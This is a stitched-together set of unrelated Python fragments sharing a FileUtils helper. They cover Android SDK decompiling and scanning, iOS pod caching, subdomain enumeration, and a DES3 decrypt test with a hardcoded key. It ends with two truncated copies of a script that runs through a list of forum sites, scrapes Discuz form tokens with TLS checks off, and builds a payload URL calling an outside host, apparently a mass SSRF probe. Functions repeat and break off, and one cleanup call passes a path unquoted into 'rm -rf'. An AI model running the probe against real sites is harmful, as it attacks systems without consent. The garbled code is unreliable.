def smali_decompile(self, jar_path):
dx_path = os.path.join(config.TOOL_PATH, "dx.jar")
dex_path = os.path.join(config.unzip_path, "classes.dex")
baksmali_jar_path = os.path.join(config.TOOL_PATH, "baksmali.jar")
process = subprocess.Popen(
["java", "-jar", dx_path, "--dex", "--output", dex_path, jar_path],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
process.communicate()
if FileUtils.is_file_exit(dex_path):
try:
command = 'java -jar \"%s\" -o \"%s\" \"%s\"' % (
baksmali_jar_path, config.smali_path, dex_path)
p = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
ret = p.communicate()
if FileUtils.is_dir_empty(config.smali_path):
logging.error(u"反编译smali失败")
return False
except Exception as e:
logging.error(u"反编译smali失败,原因:%s", e)
return False
return True
def zip_subdirs(from_dir, to_dir):
logger.info('zip_subdirs {} -> {}'.format(from_dir, to_dir))
FileUtils.create_dir(to_dir)
for dir in FileUtils.listdir_nohidden(from_dir):
logger.info('zip dir: {}'.format(dir))
ZipUtils.zip_dir('{}/{}'.format(from_dir, dir),
'{}/{}.zip'.format(to_dir, dir))
def unzip(file_path, dst_path):
if not zipfile.is_zipfile(file_path):
return False
if not os.path.exists(dst_path):
os.mkdir(dst_path, 0o777)
zfobj = zipfile.ZipFile(file_path)
for name in zfobj.namelist():
oriname = name
if os.sep == '\\':
name = name.replace('/', os.sep)
if name.endswith(os.sep):
FileUtils.create_dir(os.path.join(dst_path, name))
pass
else:
filepath = os.path.join(dst_path, name)
dir = os.path.dirname(filepath)
if not os.path.exists(dir):
FileUtils.create_dir(dir)
file = open(filepath, 'wb')
file.write(zfobj.read(oriname))
file.close()
return True
def zip_all_libs_to_cache(self):
os.system('rm -rf ' + self.cache_libs_path + '/*')
FileUtils.create_dir(self.cache_libs_path)
for dir in FileUtils.listdir_nohidden(self.generated_path):
ZipUtils.zip_dir(self.generated_path + '/' + dir,
self.cache_libs_path + '/' + dir + '.zip')
FileUtils.copy_file_or_dir(self.prebuild_path + self.manifest_file,
self.cache_path)
def start(self):
# 准备工作,解压反编译
logging.info("start sdk scan..")
if not FileUtils.is_file_exit(self.sdk_path):
logging.error("sdk文件不存在")
return
pix = os.path.splitext(self.sdk_path)[1]
if not pix == '.aar' and not pix == '.jar':
logging.error("sdk文件格式错误")
return
sdkinfo.sdk_path = self.sdk_path
is_aar = pix == '.aar'
if is_aar:
logging.info("start unzip..")
if not ZipUtils.unzip(sdkinfo.sdk_path, config.unzip_path):
logging.error("unzip error")
return
config.jar_path = os.path.join(config.unzip_path, "classes.jar")
config.res_path = os.path.join(config.unzip_path, "res")
config.xml_path = os.path.join(config.unzip_path,
"AndroidManifest.xml")
config.jni_path = os.path.join(config.unzip_path, "jni")
config.assets_path = os.path.join(config.unzip_path, "assets")
config.libs_path = os.path.join(config.unzip_path, "libs")
if not FileUtils.is_file_exit(
config.jar_path) or not FileUtils.is_file_exit(
config.xml_path):
logging.info("unzip fail,no jar or xml file.")
return
logging.info("unzip success.")
else:
config.jar_path = os.path.join(config.unzip_path, "classes.jar")
shutil.copy(config.sdk_path, config.jar_path)
logging.info("start decompile java.")
count = self.get_class_file(config.jar_path)
if self.cfr_decompile(config.jar_path, count):
logging.info("decompile java success.")
else:
logging.info("decompile java error.")
logging.info("start decompile smali.")
if self.smali_decompile(config.jar_path):
logging.info("decompile smali success.")
else:
logging.info("decompile smali error.")
self.scan(is_aar)
def scan(self):
if not FileUtils.is_file_exit(config.POLICY_PERMISSION_PATH):
logging.error("POLICY_TXT not in.")
return
if FileUtils.is_file_exit(config.xml_path):
self.find_permission_policy()
if int(sdkinfo.target_sdk_version) < 28:
self.target_sdk = True
else:
logging.info("no xml")
self.so_policy()
self.find_api_policy()
def get_info(self):
sdkinfo.sdk_name = os.path.splitext(os.path.basename(
sdkinfo.sdk_path))[0]
sdkinfo.sdk_size = str(int(os.path.getsize(sdkinfo.sdk_path) / 1024))
if not FileUtils.is_file_exit(config.xml_path):
return
with open(config.xml_path, 'r', encoding='utf-8') as file:
lines = file.readlines()
for line in lines:
if line.find('package=') > -1:
re_name = re.compile(r"package=\"(.*?)\"\s")
sdkinfo.package_name = re_name.findall(line)[0]
if line.find('versionName') > -1:
re_version = re.compile(r"versionName=\"(.*?)\"\s")
sdkinfo.version_name = re_version.findall(line)[0]
if line.find('uses-permission') > -1:
re_per = re.compile(r"android:name=\"(.*?)\"\s")
permission = re_per.findall(line)[0]
sdkinfo.permissions.append(permission)
if line.find('minSdkVersion') > -1:
re_min = re.compile(r"android:minSdkVersion=\"(.*?)\"\s")
sdkinfo.min_sdk_version = re_min.findall(line)[0]
if line.find('targetSdkVersion') > -1:
re_target = re.compile(
r"android:targetSdkVersion=\"(.*?)\"\s")
sdkinfo.target_sdk_version = re_target.findall(line)[0]
if line.find("android:allowBackup") > -1:
re_allow = re.compile(r"android:allowBackup=\"(.*?)\"\s")
sdkinfo.allow_back_up = re_allow.findall(
line)[0].lower() == "true"
if line.find("android:debuggable") > -1:
re_debug = re.compile(r"android:debuggable=\"(.*?)\"\s")
sdkinfo.debuggable = re_debug.findall(
line)[0].lower() == "true"
def save_result(filename, args):
if FileUtils.exists(filename):
try:
fd = open(filename, 'w')
json.dump(args, fd, indent=4)
finally:
fd.close()
def read_json(filename):
if FileUtils.exists(filename):
try:
fd = open(filename, 'r')
args = json.load(fd)
return args
finally:
fd.close()
else:
return []
def scan(self, path):
'''扫描目录'''
files = FileUtils.getFiles(path)
fileCount = len(files)
result = {}
result['fileCount'] = fileCount
scanResult = []
for filePath in files:
sr = self.scanFile(filePath)
if sr:
scanResult.append(sr)
result['data'] = scanResult
return result
def prebuild_if_needed(self, push=True):
self.fetch_and_apply_cache()
subprocess.run(['bundle', 'exec', 'pod', 'install'], check=True)
# Sync with cache directory
if not os.path.isfile(self.delta_path):
logger.info('No change in prebuilt frameworks')
return
try:
with open(self.delta_path) as f:
FileUtils.create_dir(self.cache_path)
data = f.read()
data = re.sub('"', '', data)
updatedMatches = re.findall(r'Updated: \[(.*)\]', data)
if updatedMatches:
updated = updatedMatches[0].strip()
logger.info("Updated frameworks: {}".format(updated))
if len(updated):
libs = updated.split(',')
for lib in libs:
libName = lib.strip()
self.clean_cache(libName)
self.zip_to_cache(libName)
deletedMatches = re.findall(r'Deleted: \[(.*)\]', data)
if deletedMatches:
deleted = deletedMatches[0].strip()
logger.info('Deleted frameworks: {}'.format(deleted))
if len(deleted):
libs = deleted.split(',')
for lib in libs:
self.clean_cache(lib.strip())
# Copy manifest file
FileUtils.copy_file_or_dir(
self.prebuild_path + self.manifest_file, self.cache_path)
if push:
self.push_all_to_git(self.cache_path)
except Exception as e:
raise e
def unzip_cache(self):
logger.info(f'Unzip cache, from {self.cache_libs_path} to {self.generated_path}')
with step('unzip_prebuild_libs'):
FileUtils.remove_dir(self.prebuild_path)
FileUtils.create_dir(self.generated_path)
FileUtils.copy_file_or_dir(os.path.join(self.cache_path, self.manifest_file), self.prebuild_path)
# Unzip libs to pod-binary folder
for zip_path in glob.iglob(os.path.join(self.cache_libs_path, '*.zip')):
ZipUtils.unzip(zip_path, self.generated_path)
def unzip_cache(self):
with step('unzip_prebuild_libs'):
FileUtils.remove_dir(self.prebuild_path)
FileUtils.create_dir(self.generated_path)
FileUtils.copy_file_or_dir(self.cache_path + self.manifest_file,
self.prebuild_path)
# Unzip libs to pod-binary folder
for zipPath in glob.iglob(self.cache_libs_path + '/*.zip'):
ZipUtils.unzip(zipPath, self.generated_path)
def __init__(self, target, dict_file='domain.csv'):
super(DomainFuzzer, self).__init__()
self.target = target
self.dict = FileUtils.getLines(dict_file)
self.nameservers = [
'114.114.114.114',
'119.29.29.29',
'223.5.5.5',
'8.8.8.8',
'182.254.116.116',
'223.6.6.6',
'8.8.4.4',
'180.76.76.76',
'216.146.35.35',
'123.125.81.6',
'218.30.118.6',]
self.resolver = Domain(self.nameservers, timeout=5)
def so_policy(self):
if FileUtils.is_dir_exit(config.jni_path):
arm_64 = os.path.join(config.jni_path, "arm64-v8a")
x86_64 = os.path.join(config.jni_path, "x86_64")
if not FileUtils.is_dir_exit(arm_64) and not FileUtils.is_dir_exit(
x86_64):
self.so_64 = True
else:
if FileUtils.is_dir_exit(config.unzip_path):
arm_64_2 = os.path.join(config.unzip_path, "arm64-v8a")
x86_64_2 = os.path.join(config.unzip_path, "x86_64")
self.so_64 = FileUtils.is_dir_empty(
arm_64_2) and FileUtils.is_dir_empty(x86_64_2)
def test_decrypt_file(self):
content = FileUtils.read_all_data(
'/Users/apple/PycharmProjects/workspace/axf_library/library/utils/tests/J_CBIB0020_AXF_20180605.zip')
# content = base64.decodestring(content)
# print content
# print b2a_hex(content)
key = '132e8a57b4f6139b3a5de9g4'
# Des3FileUtils.encrypt_file("/Users/apple/liaoshanqing/tmp/test_file_crypt.txt",
# '/Users/apple/liaoshanqing/tmp/test_file_crypt_1.txt', 8192, key, iv)
# Des3FileUtils.decrypt_file('./IMGDOC0001_AWX_20170724_0002.zip',
# './axf_test.zip', 8192, key)
des3 = DES3.new(key, DES3.MODE_ECB)
with open('./1.txt', 'wb') as out_file:
result = des3.decrypt(content)
# print result
# result = base64.decodestring(result)
# print result.decode('gbk')
# print b2a_hex(result)
out_file.write(result)
print 'ok'
def delete(self):
FileUtils.delete_dirs(config.temp_path)
def run(args):
domain = args.domain
outfile = args.out
if not domain:
print('usage: wydomain.py -d aliyun.com')
sys.exit(1)
# init _cache_path
script_path = os.path.dirname(os.path.abspath(__file__))
_cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
if not os.path.exists(_cache_path):
os.makedirs(_cache_path, 0777)
# alexa result json file
logging.info("starting alexa fetcher...")
_cache_file = os.path.join(_cache_path, 'alexa.json')
result = Alexa(domain=domain).run()
save_result(_cache_file, result)
logging.info("alexa fetcher subdomains({0}) successfully...".format(len(result)))
# threatminer result json file
logging.info("starting threatminer fetcher...")
_cache_file = os.path.join(_cache_path, 'threatminer.json')
result = Threatminer(domain=domain).run()
save_result(_cache_file, result)
logging.info("threatminer fetcher subdomains({0}) successfully...".format(len(result)))
# threatcrowd result json file
logging.info("starting threatcrowd fetcher...")
_cache_file = os.path.join(_cache_path, 'threatcrowd.json')
result = Threatcrowd(domain=domain).run()
save_result(_cache_file, result)
logging.info("threatcrowd fetcher subdomains({0}) successfully...".format(len(result)))
# sitedossier result json file
logging.info("starting sitedossier fetcher...")
_cache_file = os.path.join(_cache_path, 'sitedossier.json')
result = Sitedossier(domain=domain).run()
save_result(_cache_file, result)
logging.info("sitedossier fetcher subdomains({0}) successfully...".format(len(result)))
# netcraft result json file
logging.info("starting netcraft fetcher...")
_cache_file = os.path.join(_cache_path, 'netcraft.json')
result = Netcraft(domain=domain).run()
save_result(_cache_file, result)
logging.info("netcraft fetcher subdomains({0}) successfully...".format(len(result)))
# ilinks result json file
logging.info("starting ilinks fetcher...")
_cache_file = os.path.join(_cache_path, 'ilinks.json')
result = Ilinks(domain=domain).run()
save_result(_cache_file, result)
logging.info("ilinks fetcher subdomains({0}) successfully...".format(len(result)))
# chaxunla result json file
logging.info("starting chaxunla fetcher...")
_cache_file = os.path.join(_cache_path, 'chaxunla.json')
result = Chaxunla(domain=domain).run()
save_result(_cache_file, result)
logging.info("chaxunla fetcher subdomains({0}) successfully...".format(len(result)))
# google TransparencyReport result json file
logging.info("starting google TransparencyReport fetcher...")
result = TransparencyReport(domain=domain).run()
_cache_file = os.path.join(_cache_path, 'googlect_subject.json')
save_result(_cache_file, result.get('subjects'))
_cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
save_result(_cache_file, result.get('dns_names'))
logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))
# Collection API Subdomains
sub_files = [
'alexa.json',
'chaxunla.json',
'ilinks.json',
'netcraft.json',
'sitedossier.json',
'threatcrowd.json',
'threatminer.json']
# process all cache files
subdomains = []
for file in sub_files:
_cache_file = os.path.join(_cache_path, file)
json_data = read_json(_cache_file)
if json_data:
subdomains.extend(json_data)
# process openssl x509 dns_names
_cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
json_data = read_json(_cache_file)
for sub in json_data:
if sub.endswith(domain):
subdomains.append(sub)
# collection burte force subdomains
_burte_file = os.path.join(_cache_path, 'dnsburte.json')
if FileUtils.exists(_burte_file):
json_data = read_json(_burte_file)
if json_data:
subdomains.extend(json_data)
# save all subdomains to outfile
subdomains = list(set(subdomains))
_result_file = os.path.join(script_path, outfile)
save_result(_result_file, subdomains)
logging.info("{0} {1} subdomains save to {2}".format(
domain, len(subdomains), _result_file))
def run(args):
domain = args.domain
outfile = args.domain + '_wy.txt'
if not domain:
print('usage: wydomain.py -d aliyun.com')
sys.exit(1)
# init _cache_path
script_path = os.path.dirname(os.path.abspath(__file__))
_cache_path = os.path.join(script_path, 'result/{0}'.format(domain))
if not os.path.exists(_cache_path):
os.makedirs(_cache_path, 0777)
# alexa result json file
logging.info("starting alexa fetcher...")
_cache_file = os.path.join(_cache_path, 'alexa.json')
result = Alexa(domain=domain).run()
save_result(_cache_file, result)
logging.info("alexa fetcher subdomains({0}) successfully...".format(len(result)))
# threatminer result json file
logging.info("starting threatminer fetcher...")
_cache_file = os.path.join(_cache_path, 'threatminer.json')
result = Threatminer(domain=domain).run()
save_result(_cache_file, result)
logging.info("threatminer fetcher subdomains({0}) successfully...".format(len(result)))
# threatcrowd result json file
logging.info("starting threatcrowd fetcher...")
_cache_file = os.path.join(_cache_path, 'threatcrowd.json')
result = Threatcrowd(domain=domain).run()
save_result(_cache_file, result)
logging.info("threatcrowd fetcher subdomains({0}) successfully...".format(len(result)))
# sitedossier result json file
logging.info("starting sitedossier fetcher...")
_cache_file = os.path.join(_cache_path, 'sitedossier.json')
result = Sitedossier(domain=domain).run()
save_result(_cache_file, result)
logging.info("sitedossier fetcher subdomains({0}) successfully...".format(len(result)))
# netcraft result json file
logging.info("starting netcraft fetcher...")
_cache_file = os.path.join(_cache_path, 'netcraft.json')
result = Netcraft(domain=domain).run()
save_result(_cache_file, result)
logging.info("netcraft fetcher subdomains({0}) successfully...".format(len(result)))
# ilinks result json file
logging.info("starting ilinks fetcher...")
_cache_file = os.path.join(_cache_path, 'ilinks.json')
result = Ilinks(domain=domain).run()
save_result(_cache_file, result)
logging.info("ilinks fetcher subdomains({0}) successfully...".format(len(result)))
# chaxunla result json file
logging.info("starting chaxunla fetcher...")
_cache_file = os.path.join(_cache_path, 'chaxunla.json')
result = Chaxunla(domain=domain).run()
save_result(_cache_file, result)
logging.info("chaxunla fetcher subdomains({0}) successfully...".format(len(result)))
# google TransparencyReport result json file
logging.info("starting google TransparencyReport fetcher...")
result = TransparencyReport(domain=domain).run()
_cache_file = os.path.join(_cache_path, 'googlect_subject.json')
save_result(_cache_file, result.get('subjects'))
_cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
save_result(_cache_file, result.get('dns_names'))
logging.info("google TransparencyReport fetcher subdomains({0}) successfully...".format(len(result.get('dns_names'))))
# Collection API Subdomains
sub_files = [
'alexa.json',
'chaxunla.json',
'ilinks.json',
'netcraft.json',
'sitedossier.json',
'threatcrowd.json',
'threatminer.json']
# process all cache files
subdomains = []
for file in sub_files:
_cache_file = os.path.join(_cache_path, file)
json_data = read_json(_cache_file)
if json_data:
subdomains.extend(json_data)
# process openssl x509 dns_names
_cache_file = os.path.join(_cache_path, 'googlect_dnsnames.json')
json_data = read_json(_cache_file)
for sub in json_data:
if sub.endswith(domain):
subdomains.append(sub)
# collection burte force subdomains
_burte_file = os.path.join(_cache_path, 'dnsburte.json')
if FileUtils.exists(_burte_file):
json_data = read_json(_burte_file)
if json_data:
subdomains.extend(json_data)
# save all subdomains to outfile
subdomains = list(set(subdomains))
_result_file = os.path.join(script_path, outfile)
save_result(_result_file, subdomains)
logging.info("{0} {1} subdomains save to {2}".format(
domain, len(subdomains), _result_file))
def __init__(self, target, dict_file='domain.csv', timeout=5):
self.target = target
self.dict = FileUtils.getLines(dict_file)
self.resolver = Domain(timeout=timeout)
def get_assets(self):
if FileUtils.is_file_exit(config.assets_path):
for home, dir, filenames in os.walk(config.libs_path):
for filename in filenames:
sdkinfo.assets_files.append(filename)
def get_soname(self):
if FileUtils.is_file_exit(config.jni_path):
for dirpath, dirnames, filenames in os.walk(config.unzip_path):
for filename in filenames:
if filename.endswith(".so"):
sdkinfo.sdk_soname = filename
def clean_cache(self, lib):
lib_path = os.path.join(self.cache_libs_path, f'{lib}.zip')
logger.info(f'Clean cache of {lib} at {lib_path}')
FileUtils.remove_file(lib_path)
def clean_cache(self, libName):
FileUtils.remove_file(self.cache_libs_path + libName + ".zip")
import requests
from utils.fileutils import FileUtils
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
for website in FileUtils.getLines('qqdz.lst'):
request = requests.session()
try:
forumurl = "{website}/forum.php".format(website=website)
response = request.get(forumurl, timeout=5, verify=False)
formhash = re.findall(r'formhash" value="(.*?)"',response.content)
netloc = urlparse.urlparse(website).netloc
payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc)
import random
import time
import re
import requests
from utils.fileutils import FileUtils
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
for website in FileUtils.getLines('qqdz.lst'):
request = requests.session()
try:
forumurl = "{website}/forum.php".format(website=website)
response = request.get(forumurl, timeout=5, verify=False)
formhash = re.findall(r'formhash" value="(.*?)"', response.content)
netloc = urlparse.urlparse(website).netloc
payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(
netloc=netloc)
